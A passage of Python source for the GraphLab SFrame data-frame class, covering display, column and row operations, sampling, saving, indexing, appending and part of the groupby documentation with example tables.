    as pretty tables, optionally followed by a size footer.
    """
    max_rows = num_rows
    preview = self._imagecols_to_stringcols(max_rows)
    tables = preview.__get_pretty_tables__(wrap_text=False,
                                           max_rows_to_display=max_rows)
    body = '\n'.join(str(tb) for tb in tables)
    if not footer:
        return body
    if self.__has_size__():
        tail = '[%d rows x %d columns]\n' % self.shape
        # Hint that more rows exist beyond the preview.
        if self.num_rows() > max_rows:
            tail += '\n'.join(FOOTER_STRS)
    else:
        # Lazily-evaluated frames have an unknown row count.
        tail = '[? rows x %d columns]\n' % self.num_columns()
        tail += '\n'.join(LAZY_FOOTER_STRS)
    return body + "\n" + tail
def _repr_html_(self):
    """
    IPython/Jupyter rich-display hook: render the first 10 rows as HTML
    tables inside a scrollable <div>, followed by a size footer.
    """
    max_rows = 10
    preview = self._imagecols_to_stringcols(max_rows)
    tables = preview.__get_pretty_tables__(wrap_text=True,
                                           max_row_width=120,
                                           max_columns=40,
                                           max_column_width=25,
                                           max_rows_to_display=max_rows)
    if self.__has_size__():
        tail = '[%d rows x %d columns]<br/>' % self.shape
        if self.num_rows() > max_rows:
            tail += '<br/>'.join(FOOTER_STRS)
    else:
        tail = '[? rows x %d columns]<br/>' % self.num_columns()
        tail += '<br/>'.join(LAZY_FOOTER_STRS)
    html = '\n'.join(tb.get_html_string(format=True) for tb in tables)
    return ('<div style="max-height:1000px;max-width:1500px;overflow:auto;">'
            + html + "\n" + tail + '\n</div>')
def __nonzero__(self):
    """
    Truth value of the frame: True iff it contains at least one row.
    """
    return bool(self.num_rows())
def __len__(self):
    """
    Returns the number of rows of the sframe.
    """
    # Thin alias for num_rows() so len(sf) works.
    return self.num_rows()
def __copy__(self):
    """
    Returns a shallow copy of the sframe.
    """
    # Selecting every column yields a new SFrame over the same columns.
    return self.select_columns(self.column_names())
def __eq__(self, other):
    # Whole-frame equality is deliberately undefined.
    raise NotImplementedError
def __ne__(self, other):
    # Whole-frame inequality is deliberately undefined, mirroring __eq__.
    raise NotImplementedError
def _row_selector(self, other):
    """
    Where `other` is an SArray of identical length as the current frame,
    return the subset of rows for which the corresponding selector entry
    is non-zero.  Anything that is not an SArray is ignored (the method
    returns None), matching the original implicit behavior.
    """
    if type(other) is not SArray:
        return None
    if len(other) != len(self):
        raise IndexError("Cannot perform logical indexing on arrays of different length.")
    with cython_context():
        return SFrame(_proxy=self.__proxy__.logical_filter(other.__proxy__))
def dtype(self):
    """
    The type of each column.

    This is an alias for :meth:`column_types`, provided for API symmetry
    with SArray.dtype.

    Returns
    -------
    out : list[type]
        Column types of the SFrame.

    See Also
    --------
    column_types
    """
    column_type_list = self.column_types()
    return column_type_list
def num_rows(self):
    """
    The number of rows in this SFrame.

    Returns
    -------
    out : int
        Number of rows in the SFrame.

    See Also
    --------
    num_columns
    """
    # Delegate straight to the C++ proxy.
    proxy = self.__proxy__
    return proxy.num_rows()
def num_cols(self):
    """
    The number of columns in this SFrame.

    This is a short alias with the same result as :meth:`num_columns`.

    Returns
    -------
    out : int
        Number of columns in the SFrame.

    See Also
    --------
    num_columns, num_rows
    """
    proxy = self.__proxy__
    return proxy.num_columns()
def num_columns(self):
    """
    The number of columns in this SFrame.

    Returns
    -------
    out : int
        Number of columns in the SFrame.

    See Also
    --------
    num_cols, num_rows
    """
    # Delegate straight to the C++ proxy.
    proxy = self.__proxy__
    return proxy.num_columns()
def column_names(self):
    """
    The name of each column in the SFrame.

    Returns
    -------
    out : list[string]
        Column names of the SFrame.

    See Also
    --------
    rename
    """
    # Delegate straight to the C++ proxy.
    proxy = self.__proxy__
    return proxy.column_names()
def column_types(self):
    """
    The type of each column in the SFrame.

    Returns
    -------
    out : list[type]
        Column types of the SFrame.

    See Also
    --------
    dtype
    """
    # The proxy exposes the per-column types under the name 'dtype'.
    proxy = self.__proxy__
    return proxy.dtype()
def head(self, n=10):
    """
    The first n rows of the SFrame.

    Parameters
    ----------
    n : int, optional
        The number of rows to fetch.

    Returns
    -------
    out : SFrame
        A new SFrame which contains the first n rows of the current SFrame

    See Also
    --------
    tail, print_rows
    """
    head_proxy = self.__proxy__.head(n)
    return SFrame(_proxy=head_proxy)
def to_dataframe(self):
    """
    Convert this SFrame to pandas.DataFrame.

    This operation will construct a pandas.DataFrame in memory. Care must
    be taken when size of the returned object is big.

    Returns
    -------
    out : pandas.DataFrame
        The dataframe which contains all rows of SFrame
    """
    assert HAS_PANDAS
    df = pandas.DataFrame()
    # Fixed: the original re-queried self.column_names() through the proxy
    # on every loop iteration; fetch names and types once up front.
    column_names = self.column_names()
    column_types = self.column_types()
    for column_name, column_type in zip(column_names, column_types):
        df[column_name] = list(self[column_name])
        if len(df[column_name]) == 0:
            # An empty column arrives as an empty list with no dtype;
            # restore the SFrame's declared type so the empty DataFrame
            # still carries the schema.
            df[column_name] = df[column_name].astype(column_type)
    return df
def tail(self, n=10):
    """
    The last n rows of the SFrame.

    Parameters
    ----------
    n : int, optional
        The number of rows to fetch.

    Returns
    -------
    out : SFrame
        A new SFrame which contains the last n rows of the current SFrame

    See Also
    --------
    head, print_rows
    """
    tail_proxy = self.__proxy__.tail(n)
    return SFrame(_proxy=tail_proxy)
def apply(self, fn, dtype=None, seed=None):
    """
    Transform each row to an :class:`~graphlab.SArray` according to a
    specified function. Returns a new SArray of ``dtype`` where each element
    in this SArray is transformed by `fn(x)` where `x` is a single row in
    the sframe represented as a dictionary. The ``fn`` should return
    exactly one value which can be cast into type ``dtype``. If ``dtype`` is
    not specified, the first 100 rows of the SFrame are used to make a guess
    of the target data type.

    Parameters
    ----------
    fn : function
        The function to transform each row of the SFrame. The return
        type should be convertible to `dtype` if `dtype` is not None.
        This can also be a toolkit extension function which is compiled
        as a native shared library using SDK.

    dtype : dtype, optional
        The dtype of the new SArray. If None, the first 100
        elements of the array are used to guess the target
        data type.

    seed : int, optional
        Used as the seed if a random number generator is included in `fn`.

    Returns
    -------
    out : SArray
        The SArray transformed by fn. Each element of the SArray is of
        type ``dtype``

    Examples
    --------
    Concatenate strings from several columns:

    >>> sf = graphlab.SFrame({'user_id': [1, 2, 3], 'movie_id': [3, 3, 6],
                              'rating': [4, 5, 1]})
    >>> sf.apply(lambda x: str(x['user_id']) + str(x['movie_id']) + str(x['rating']))
    dtype: str
    Rows: 3
    ['134', '235', '361']

    Using native toolkit extension function:

    .. code-block:: c++

        #include <graphlab/sdk/toolkit_function_macros.hpp>
        double mean(const std::map<flexible_type, flexible_type>& dict) {
          double sum = 0.0;
          for (const auto& kv: dict) sum += (double)kv.second;
          return sum / dict.size();
        }

        BEGIN_FUNCTION_REGISTRATION
        REGISTER_FUNCTION(mean, "row");
        END_FUNCTION_REGISTRATION

    compiled into example.so

    >>> import example

    >>> sf = graphlab.SFrame({'x0': [1, 2, 3], 'x1': [2, 3, 1],
    ...                       'x2': [3, 1, 2]})
    >>> sf.apply(example.mean)
    dtype: float
    Rows: 3
    [2.0,2.0,2.0]
    """
    assert _is_callable(fn), "Input must be a function"
    # Dry-run fn on the first 10 rows: surfaces user-function errors early
    # and supplies sample outputs for the dtype inference below.
    test_sf = self[:10]
    dryrun = [fn(row) for row in test_sf]
    if dtype is None:
        dtype = SArray(dryrun).dtype()
    # NOTE(review): 'if not seed' also replaces an explicit seed of 0 with
    # the current time -- confirm whether seed=0 should be honored.
    if not seed:
        seed = int(time.time())

    _mt._get_metric_tracker().track('sframe.apply')

    # If fn is a compiled toolkit extension function, dispatch to the
    # native execution path; any failure to build the native call simply
    # falls back to the regular lambda path.
    nativefn = None
    try:
        import graphlab.extensions as extensions
        nativefn = extensions._build_native_function_call(fn)
    except:
        pass

    if nativefn is not None:
        # this is a toolkit lambda. We can do something about it
        with cython_context():
            return SArray(_proxy=self.__proxy__.transform_native(nativefn, dtype, seed))

    with cython_context():
        return SArray(_proxy=self.__proxy__.transform(fn, dtype, seed))
def flat_map(self, column_names, fn, column_types='auto', seed=None):
    """
    Map each row of the SFrame to multiple rows in a new SFrame via a
    function.

    The output of `fn` must have type List[List[...]]. Each inner list
    will be a single row in the new output, and the collection of these
    rows within the outer list make up the data for the output SFrame.
    All rows must have the same length and the same order of types to
    make sure the result columns are homogeneously typed. For example, if
    the first element emitted into in the outer list by `fn` is
    [43, 2.3, 'string'], then all other elements emitted into the outer
    list must be a list with three elements, where the first is an int,
    second is a float, and third is a string. If column_types is not
    specified, the first 10 rows of the SFrame are used to determine the
    column types of the returned sframe.

    Parameters
    ----------
    column_names : list[str]
        The column names for the returned SFrame.

    fn : function
        The function that maps each of the sframe row into multiple rows,
        returning List[List[...]]. All outputted rows must have the same
        length and order of types.

    column_types : list[type], optional
        The column types of the output SFrame. Default value will be
        automatically inferred by running `fn` on the first 10 rows of the
        input. If the types cannot be inferred from the first 10 rows, an
        error is raised.

    seed : int, optional
        Used as the seed if a random number generator is included in `fn`.

    Returns
    -------
    out : SFrame
        A new SFrame containing the results of the flat_map of the
        original SFrame.

    Examples
    ---------
    Repeat each row according to the value in the 'number' column.

    >>> sf = graphlab.SFrame({'letter': ['a', 'b', 'c'],
    ...                       'number': [1, 2, 3]})
    >>> sf.flat_map(['number', 'letter'],
    ...             lambda x: [list(x.itervalues()) for i in range(0, x['number'])])
    +--------+--------+
    | number | letter |
    +--------+--------+
    |   1    |   a    |
    |   2    |   b    |
    |   2    |   b    |
    |   3    |   c    |
    |   3    |   c    |
    |   3    |   c    |
    +--------+--------+
    [6 rows x 2 columns]
    """
    assert inspect.isfunction(fn), "Input must be a function"
    if not seed:
        seed = int(time.time())
    _mt._get_metric_tracker().track('sframe.flat_map')

    # determine the column_types
    if column_types == 'auto':
        # Run fn on the first 10 rows and collect the tuple of element
        # types from every emitted row; exactly one distinct tuple means
        # the output schema is unambiguous.
        types = set()
        sample = self[0:10]
        results = [fn(row) for row in sample]
        for rows in results:
            if type(rows) is not list:
                raise TypeError("Output type of the lambda function must be a list of lists")
            # note: this skips empty lists
            for row in rows:
                if type(row) is not list:
                    raise TypeError("Output type of the lambda function must be a list of lists")
                types.add(tuple([type(v) for v in row]))
        if len(types) == 0:
            # Fixed: the original used the Python-2-only statement form
            # "raise TypeError, msg", which is a syntax error under
            # Python 3; the parenthesized form below is valid in both.
            raise TypeError(
                "Could not infer output column types from the first ten rows " +
                "of the SFrame. Please use the 'column_types' parameter to " +
                "set the types.")
        if len(types) > 1:
            raise TypeError("Mapped rows must have the same length and types")
        column_types = list(types.pop())

    assert type(column_types) is list
    assert len(column_types) == len(column_names), "Number of output columns must match the size of column names"
    with cython_context():
        return SFrame(_proxy=self.__proxy__.flat_map(fn, column_names, column_types, seed))
def sample(self, fraction, seed=None):
    """
    Create a new SFrame containing a random subset of this SFrame's rows.

    Parameters
    ----------
    fraction : float
        Approximate fraction of the rows to keep; must lie in [0, 1].
        The result has roughly ``fraction * num_rows`` rows.
    seed : int, optional
        Seed for the random number generator. When omitted (or falsy),
        the current time is used, so results differ between calls.

    Returns
    -------
    out : SFrame
        A new SFrame containing the sampled rows.
    """
    if not seed:
        seed = int(time.time())
    if fraction < 0 or fraction > 1:
        raise ValueError('Invalid sampling rate: ' + str(fraction))
    _mt._get_metric_tracker().track('sframe.sample')
    # An empty frame has nothing to sample; hand it back unchanged.
    if self.num_rows() == 0 or self.num_cols() == 0:
        return self
    with cython_context():
        return SFrame(_proxy=self.__proxy__.sample(fraction, seed))
def random_split(self, fraction, seed=None):
    """
    Randomly split the rows of an SFrame into two SFrames.

    The first SFrame holds approximately ``fraction`` of the rows,
    sampled uniformly without replacement; the second holds the rest.

    Parameters
    ----------
    fraction : float
        Approximate fraction of rows to place in the first SFrame.
        Must be between 0 and 1.
    seed : int, optional
        Seed for the random number generator used to split.

    Returns
    -------
    out : tuple [SFrame]
        Two new SFrames.
    """
    if fraction < 0 or fraction > 1:
        raise ValueError('Invalid sampling rate: ' + str(fraction))
    if self.num_rows() == 0 or self.num_cols() == 0:
        return (SFrame(), SFrame())
    if not seed:
        seed = int(time.time())
    # The server side requires this to be an int, so cast if we can.
    try:
        seed = int(seed)
    except ValueError:
        raise ValueError("The 'seed' parameter must be of type int.")
    _mt._get_metric_tracker().track('sframe.random_split')
    with cython_context():
        proxy_pair = self.__proxy__.random_split(fraction, seed)
        first = SFrame(data=[], _proxy=proxy_pair[0])
        second = SFrame(data=[], _proxy=proxy_pair[1])
        return (first, second)
def topk(self, column_name, k=10, reverse=False):
    """
    Return the ``k`` rows with the largest values in ``column_name``,
    sorted by that column in descending order. With ``reverse=True``,
    return the ``k`` smallest rows in ascending order instead.

    When ``k`` is small, ``topk`` is more efficient than a full sort.

    Parameters
    ----------
    column_name : string
        The column to rank rows by.
    k : int, optional
        The number of rows to return.
    reverse : bool, optional
        If True, return the top k rows in ascending order.

    Returns
    -------
    out : SFrame
        An SFrame containing the top k rows sorted by ``column_name``.

    See Also
    --------
    sort
    """
    # Exact type check (not isinstance) kept to match the rest of the API.
    if type(column_name) is not str:
        raise TypeError("column_name must be a string")
    _mt._get_metric_tracker().track('sframe.topk')
    top_rows = self[self[column_name].topk_index(k, reverse)]
    return top_rows.sort(column_name, ascending=reverse)
def save(self, filename, format=None):
    """
    Save the SFrame to a file system for later use.

    Parameters
    ----------
    filename : string
        The location to save the SFrame. Either a local directory or a
        remote URL. If the format is 'binary', a directory will be created
        at the location which will contain the sframe.
    format : {'binary', 'csv'}, optional
        Format in which to save the SFrame. Binary saved SFrames can be
        loaded much faster and without any format conversion losses. If not
        given, will try to infer the format from filename given. If file
        name ends with 'csv' or '.csv.gz', then save as 'csv' format,
        otherwise save as 'binary' format.

    Raises
    ------
    ValueError
        If ``format`` is neither 'csv' nor 'binary'.

    See Also
    --------
    load_sframe, SFrame
    """
    _mt._get_metric_tracker().track('sframe.save', properties={'format':format})
    # BUG FIX: the original compared strings with `is` / `is not`, which
    # tests object identity and only worked by accident of CPython string
    # interning. Use equality (`==` / `!=`) instead.
    if format is None:
        # Infer the format from the filename extension.
        if filename.endswith(('.csv', '.csv.gz')):
            format = 'csv'
        else:
            format = 'binary'
    else:
        if format == 'csv':
            # Force a .csv extension so the assertion below always holds.
            if not filename.endswith(('.csv', '.csv.gz')):
                filename = filename + '.csv'
        elif format != 'binary':
            raise ValueError("Invalid format: {}. Supported formats are 'csv' and 'binary'".format(format))
    ## Save the SFrame
    url = _make_internal_url(filename)
    with cython_context():
        if format == 'binary':
            self.__proxy__.save(url)
        elif format == 'csv':
            assert filename.endswith(('.csv', '.csv.gz'))
            self.__proxy__.save_as_csv(url, {})
        else:
            raise ValueError("Unsupported format: {}".format(format))
def select_column(self, key):
    """
    Get a reference to the :class:`~graphlab.SArray` for the column named
    ``key``. Raises if ``key`` is not a string or is not a column name.

    Parameters
    ----------
    key : str
        The column name.

    Returns
    -------
    out : SArray
        The SArray that is referred by ``key``.

    See Also
    --------
    select_columns
    """
    if not isinstance(key, str):
        raise TypeError("Invalid key type: must be str")
    with cython_context():
        column_proxy = self.__proxy__.select_column(key)
        return SArray(data=[], _proxy=column_proxy)
def select_columns(self, keylist):
    """
    Get an SFrame composed only of the columns named in ``keylist``.
    Raises if any name is missing from this SFrame, if ``keylist`` is
    not an iterable of strings, or if it contains duplicates.

    Parameters
    ----------
    keylist : list[str]
        The list of column names.

    Returns
    -------
    out : SFrame
        A new SFrame made up of the requested columns.

    See Also
    --------
    select_column
    """
    if not hasattr(keylist, '__iter__'):
        raise TypeError("keylist must be an iterable")
    if not all(isinstance(name, str) for name in keylist):
        raise TypeError("Invalid key type: must be str")
    unique_keys = set(keylist)
    if len(unique_keys) != len(keylist):
        # Find one offending name to report.
        for candidate in unique_keys:
            if keylist.count(candidate) > 1:
                raise ValueError("There are duplicate keys in key list: '" + candidate + "'")
    with cython_context():
        return SFrame(data=[], _proxy=self.__proxy__.select_columns(keylist))
def add_column(self, data, name=""):
    """
    Add a column to this SFrame in place and return self. The number of
    elements in ``data`` must match the length of every other column.

    Parameters
    ----------
    data : SArray
        The 'column' of data to add.
    name : string, optional
        The name of the column. If no name is given, a default name is
        chosen.

    Returns
    -------
    out : SFrame
        The current SFrame.

    See Also
    --------
    add_columns
    """
    if not isinstance(data, SArray):
        raise TypeError("Must give column as SArray")
    if not isinstance(name, str):
        raise TypeError("Invalid column name: must be str")
    with cython_context():
        self.__proxy__.add_column(data.__proxy__, name)
    return self
def add_columns(self, data, namelist=None):
    """
    Add multiple columns to this SFrame in place and return self. All
    columns must have the same length as the existing columns.

    Parameters
    ----------
    data : list[SArray] or SFrame
        The columns to add.
    namelist : list of string, optional
        A list of column names. All names must be specified. ``namelist``
        is ignored if ``data`` is an SFrame.

    Returns
    -------
    out : SFrame
        The current SFrame.

    See Also
    --------
    add_column
    """
    if isinstance(data, SFrame):
        # Pull each column (and its name) out of the other frame.
        namelist = data.column_names()
        columns = [data.select_column(col_name) for col_name in namelist]
        existing = set(self.column_names())
        for col_name in namelist:
            if col_name in existing:
                raise ValueError("Column '" + col_name + "' already exists in current SFrame")
    else:
        columns = data
        if not hasattr(columns, '__iter__'):
            raise TypeError("datalist must be an iterable")
        if not hasattr(namelist, '__iter__'):
            raise TypeError("namelist must be an iterable")
        if not all(isinstance(col, SArray) for col in columns):
            raise TypeError("Must give column as SArray")
        if not all(isinstance(col_name, str) for col_name in namelist):
            raise TypeError("Invalid column name in list : must all be str")
    with cython_context():
        self.__proxy__.add_columns([col.__proxy__ for col in columns], namelist)
        return self
def remove_column(self, name):
    """
    Remove a column from this SFrame in place and return self.

    Parameters
    ----------
    name : string
        The name of the column to remove.

    Returns
    -------
    out : SFrame
        The SFrame with the given column removed.

    Raises
    ------
    KeyError
        If ``name`` is not a column of this SFrame.
    """
    current_names = self.column_names()
    if name not in current_names:
        raise KeyError('Cannot find column %s' % name)
    with cython_context():
        self.__proxy__.remove_column(current_names.index(name))
    return self
def remove_columns(self, column_names):
    """
    Remove one or more columns from this SFrame. This operation modifies
    the current SFrame in place and returns self.

    Parameters
    ----------
    column_names : list or iterable
        A list or iterable of column names. Listing the same name more
        than once removes that column only once.

    Returns
    -------
    out : SFrame
        The SFrame with given columns removed.

    Raises
    ------
    KeyError
        If any name is not a column of this SFrame.
    """
    column_names = list(column_names)
    existing_columns = dict((k, i) for i, k in enumerate(self.column_names()))
    for name in column_names:
        if name not in existing_columns:
            raise KeyError('Cannot find column %s' % name)
    # BUG FIX: deduplicate the indices. Previously a name listed twice
    # scheduled the same column id twice; after the first removal the
    # second delete at that id removed an unrelated (shifted) column.
    # Delete going backwards so earlier removals don't invalidate the
    # remaining indices.
    deletion_indices = sorted(set(existing_columns[name] for name in column_names))
    with cython_context():
        for colid in reversed(deletion_indices):
            self.__proxy__.remove_column(colid)
    return self
def swap_columns(self, column_1, column_2):
    """
    Swap the positions of the two named columns in place and return self.

    Parameters
    ----------
    column_1 : string
        Name of column to swap.
    column_2 : string
        Name of other column to swap.

    Returns
    -------
    out : SFrame
        The SFrame with swapped columns.
    """
    current_names = self.column_names()
    # list.index raises ValueError if either name is missing.
    first_pos = current_names.index(column_1)
    second_pos = current_names.index(column_2)
    with cython_context():
        self.__proxy__.swap_columns(first_pos, second_pos)
    return self
def rename(self, names):
    """
    Rename the given columns in place and return self. ``names`` maps
    each old column name to its new name.

    Parameters
    ----------
    names : dict [string, string]
        Dictionary of [old_name, new_name].

    Returns
    -------
    out : SFrame
        The current SFrame.

    See Also
    --------
    column_names
    """
    if type(names) is not dict:
        raise TypeError('names must be a dictionary: oldname -> newname')
    # Validate every old name before touching anything.
    all_columns = set(self.column_names())
    for old_name in names:
        if old_name not in all_columns:
            raise ValueError('Cannot find column %s in the SFrame' % old_name)
    with cython_context():
        for old_name in names:
            # Re-read the names each time: earlier renames shift nothing,
            # but the proxy is addressed by current position.
            position = self.column_names().index(old_name)
            self.__proxy__.set_column_name(position, names[old_name])
    return self
def __getitem__(self, key):
    """
    This method does things based on the type of `key`.

    If `key` is:
    * str
        Calls `select_column` on `key`.
    * SArray
        Performs a logical filter. Expects given SArray to be the same
        length as all columns in current SFrame. Every row corresponding
        with an entry in the given SArray that is equivalent to False is
        filtered from the result.
    * int
        Returns a single row of the SFrame (the `key`th one) as a
        dictionary. Negative indices count from the end.
    * slice
        Returns an SFrame including only the sliced rows.
    """
    if type(key) is SArray:
        return self._row_selector(key)
    elif type(key) is list:
        return self.select_columns(key)
    elif type(key) is str:
        return self.select_column(key)
    elif type(key) is int:
        if key < 0:
            key = len(self) + key
        # BUG FIX: also reject indices that are still negative after
        # adjustment (e.g. -100 on a 3-row frame) instead of passing a
        # negative position to copy_range.
        if key < 0 or key >= len(self):
            raise IndexError("SFrame index out of range")
        return list(SFrame(_proxy = self.__proxy__.copy_range(key, 1, key+1)))[0]
    elif type(key) is slice:
        start = key.start
        stop = key.stop
        step = key.step
        if start is None:
            start = 0
        if stop is None:
            stop = len(self)
        if step is None:
            step = 1
        # Handle negative indices; clamp at 0 like built-in sequence
        # slicing so out-of-range negatives yield an empty result rather
        # than a negative position reaching copy_range.
        if start < 0:
            start = max(0, len(self) + start)
        if stop < 0:
            stop = max(0, len(self) + stop)
        return SFrame(_proxy = self.__proxy__.copy_range(start, step, stop))
    else:
        raise TypeError("Invalid index type: must be SArray, list, str, int, or slice")
def __setitem__(self, key, value):
    """
    A wrapper around add_column(s). Key can be either a list or a str. If
    value is an SArray, it is added to the SFrame as a column. If it is a
    constant value (int, str, or float), then a column is created where
    every entry is equal to the constant value. Existing columns can also
    be replaced using this wrapper.
    """
    if type(key) is list:
        # Multiple column names: delegate straight to add_columns.
        self.add_columns(value, key)
    elif type(key) is str:
        # Normalize `value` into an SArray first.
        sa_value = None
        if (type(value) is SArray):
            sa_value = value
        elif hasattr(value, '__iter__'):  # wrap list, array... to sarray
            sa_value = SArray(value)
        else:  # create an sarray of constant value
            sa_value = SArray.from_const(value, self.num_rows())
        # set new column
        if not key in self.column_names():
            with cython_context():
                self.add_column(sa_value, key)
        else:
            # special case if replacing the only column.
            # server would fail the replacement if the new column has different
            # length than current one, which doesn't make sense if we are replacing
            # the only column. To support this, we first take out the only column
            # and then put it back if exception happens
            single_column = (self.num_cols() == 1)
            if (single_column):
                tmpname = key
                saved_column = self.select_column(key)
                self.remove_column(key)
            else:
                # add the column to a unique column name.
                # '__' + joined names cannot collide with any existing column.
                tmpname = '__' + '-'.join(self.column_names())
            try:
                self.add_column(sa_value, tmpname)
            except Exception as e:
                # Roll back: restore the column we removed above, then
                # re-raise the original failure.
                if (single_column):
                    self.add_column(saved_column, key)
                raise
            if (not single_column):
                # if add succeeded, remove the column name and rename tmpname->columnname.
                self.swap_columns(key, tmpname)
                self.remove_column(key)
                self.rename({tmpname: key})
    else:
        raise TypeError('Cannot set column with key type ' + str(type(key)))
def __delitem__(self, key):
    """
    Support ``del sf[column_name]`` by delegating to remove_column.
    """
    self.remove_column(key)
def __materialize__(self):
    """
    Force a lazily evaluated SFrame to be persisted to disk, committing
    all pending lazy operations.
    """
    with cython_context():
        self.__proxy__.materialize()
def __is_materialized__(self):
    """
    Return whether the SFrame has already been materialized.
    """
    return self.__proxy__.is_materialized()
def __has_size__(self):
    """
    Return whether the number of rows of the SFrame is known.
    """
    return self.__proxy__.has_size()
def __iter__(self):
    """
    Iterate over the rows of the SFrame, yielding one dict per row that
    maps column names to values. Rows are fetched from the backend in
    large batches.
    """
    _mt._get_metric_tracker().track('sframe.__iter__')
    def row_generator():
        batch_size = 262144
        self.__proxy__.begin_iterator()
        batch = self.__proxy__.iterator_get_next(batch_size)
        names = self.column_names()
        while True:
            for values in batch:
                yield dict(zip(names, values))
            # A short batch means the backend iterator is exhausted.
            if len(batch) < batch_size:
                break
            batch = self.__proxy__.iterator_get_next(batch_size)
    return row_generator()
def append(self, other):
    """
    Add the rows of an SFrame to the end of this SFrame.

    Both SFrames must have the same set of columns with the same column
    names and column types (column order may differ).

    Parameters
    ----------
    other : SFrame
        Another SFrame whose rows are appended to the current SFrame.

    Returns
    -------
    out : SFrame
        The result SFrame from the append operation.
    """
    _mt._get_metric_tracker().track('sframe.append')
    if type(other) is not SFrame:
        raise RuntimeError("SFrame append can only work with SFrame")
    left_empty = len(self.column_names()) == 0
    right_empty = len(other.column_names()) == 0
    if left_empty and right_empty:
        return SFrame()
    if left_empty or right_empty:
        # Appending to/from an empty frame is just the non-empty one.
        return self if right_empty else other
    my_column_names = self.column_names()
    my_column_types = self.column_types()
    other_column_names = other.column_names()
    if len(my_column_names) != len(other_column_names):
        raise RuntimeError("Two SFrames have to have the same number of columns")
    # Check whether the column order already matches.
    same_order = all(mine == theirs
                     for mine, theirs in zip(my_column_names, other_column_names))
    processed_other_frame = other
    if not same_order:
        # Column order may differ between the two frames, so rebuild
        # "other" with columns arranged in this frame's order.
        processed_other_frame = SFrame()
        for i in range(len(my_column_names)):
            col_name = my_column_names[i]
            if col_name not in other_column_names:
                raise RuntimeError("Column " + my_column_names[i] + " does not exist in second SFrame")
            other_column = other.select_column(col_name)
            processed_other_frame.add_column(other_column, col_name)
            # check column type
            if my_column_types[i] != other_column.dtype():
                raise RuntimeError("Column " + my_column_names[i] + " type is not the same in two SFrames, one is " + str(my_column_types[i]) + ", the other is " + str(other_column.dtype()))
    with cython_context():
        processed_other_frame.__materialize__()
        return SFrame(_proxy=self.__proxy__.append(processed_other_frame.__proxy__))
def groupby(self, key_columns, operations, *args):
    """
    Perform a group on the key_columns followed by aggregations on the
    columns listed in operations.
    The operations parameter is a dictionary that indicates which
    aggregation operators to use and which columns to use them on. The
    available operators are SUM, MAX, MIN, COUNT, AVG, VAR, STDV, CONCAT,
    SELECT_ONE, ARGMIN, ARGMAX, and QUANTILE. For convenience, aggregators
    MEAN, STD, and VARIANCE are available as synonyms for AVG, STDV, and
    VAR. See :mod:`~graphlab.aggregate` for more detail on the aggregators.
    Parameters
    ----------
    key_columns : string | list[string]
        Column(s) to group by. Key columns can be of any type other than
        dictionary.
    operations : dict, list
        Dictionary of columns and aggregation operations. Each key is a
        output column name and each value is an aggregator. This can also
        be a list of aggregators, in which case column names will be
        automatically assigned.
    *args
        All other remaining arguments will be interpreted in the same
        way as the operations argument.
    Returns
    -------
    out_sf : SFrame
        A new SFrame, with a column for each groupby column and each
        aggregation operation.
    See Also
    --------
    aggregate
    Examples
    --------
    Suppose we have an SFrame with movie ratings by many users.
    >>> import graphlab.aggregate as agg
    >>> url = 'http://s3.amazonaws.com/gl-testdata/rating_data_example.csv'
    >>> sf = graphlab.SFrame.read_csv(url)
    >>> sf
    +---------+----------+--------+
    | user_id | movie_id | rating |
    +---------+----------+--------+
    |  25904  |   1663   |   3    |
    |  25907  |   1663   |   3    |
    |  25923  |   1663   |   3    |
    |  25924  |   1663   |   3    |
    |  25928  |   1663   |   2    |
    |  25933  |   1663   |   4    |
    |  25934  |   1663   |   4    |
    |  25935  |   1663   |   4    |
    |  25936  |   1663   |   5    |
    |  25937  |   1663   |   2    |
    |   ...   |   ...    |  ...   |
    +---------+----------+--------+
    [10000 rows x 3 columns]
    Compute the number of occurrences of each user.
    >>> user_count = sf.groupby(key_columns='user_id',
    ...                         operations={'count': agg.COUNT()})
    >>> user_count
    +---------+-------+
    | user_id | count |
    +---------+-------+
    |  62361  |   1   |
    |  30727  |   1   |
    |  40111  |   1   |
    |  50513  |   1   |
    |  35140  |   1   |
    |  42352  |   1   |
    |  29667  |   1   |
    |  46242  |   1   |
    |  58310  |   1   |
    |  64614  |   1   |
    |   ...   |  ...  |
    +---------+-------+
    [9852 rows x 2 columns]
    Compute the mean and standard deviation of ratings per user.
    >>> user_rating_stats = sf.groupby(key_columns='user_id',
    ...                                operations={
    ...                                    'mean_rating': agg.MEAN('rating'),
    ...                                    'std_rating': agg.STD('rating')
    ...                                })
    >>> user_rating_stats
    +---------+-------------+------------+
    | user_id | mean_rating | std_rating |
    +---------+-------------+------------+
    |  62361  |     5.0     |    0.0     |
    |  30727  |     4.0     |    0.0     |
    |  40111  |     2.0     |    0.0     |
    |  50513  |     4.0     |    0.0     |
    |  35140  |     4.0     |    0.0     |
    |  42352  |     5.0     |    0.0     |
    |  29667  |     4.0     |    0.0     |
    |  46242  |     5.0     |    0.0     |
    |  58310  |     2.0     |    0.0     |
    |  64614  |     2.0     |    0.0     |
    |   ...   |     ...     |    ...     |
    +---------+-------------+------------+
    [9852 rows x 3 columns]
    Compute the movie with the minimum rating per user.
    >>> chosen_movies = sf.groupby(key_columns='user_id',
    ...                            operations={
    ...                                'worst_movies': agg.ARGMIN('rating','movie_id')
    ...                            })
    >>> chosen_movies
    +---------+-------------+
    | user_id | worst_movies |
    +---------+-------------+
    |  62361  |     1663    |
    |  30727  |     1663    |
    |  40111  |     1663    |
    |  50513  |     1663    |
    |  35140  |     1663    |
    |  42352  |     1663    |
    |  29667  |     1663    |
    |  46242  |     1663    |
    |  58310  |     1663    |
    |  64614  |     1663    |
    |   ...   |     ...     |
    +---------+-------------+
    [9852 rows x 2 columns]
    Compute the movie with the max rating per user and also the movie with
    the maximum imdb-ranking per user.
    >>> sf['imdb-ranking'] = sf['rating'] * 10
    >>> chosen_movies = sf.groupby(key_columns='user_id',
    ...         operations={('max_rating_movie','max_imdb_ranking_movie'): agg.ARGMAX(('rating','imdb-ranking'),'movie_id')})
    >>> chosen_movies
    +---------+------------------+------------------------+
    | user_id | max_rating_movie | max_imdb_ranking_movie |
    +---------+------------------+------------------------+
    |  62361  |       1663       |          16630         |
    |  30727  |       1663       |          16630         |
    |  40111  |       1663       |          16630         |
    |  50513  |       1663       |          16630         |
    |  35140  |       1663       |          16630         |
    |  42352  |       1663       |          16630         |
    |  29667  |       1663       |          16630         |
    |  46242  |       1663       |          16630         |
    |  58310  |       1663       |          16630         |
    |  64614  |       1663       |          16630         |
    |   ...   |       ...        |          ...           |
    +---------+------------------+------------------------+
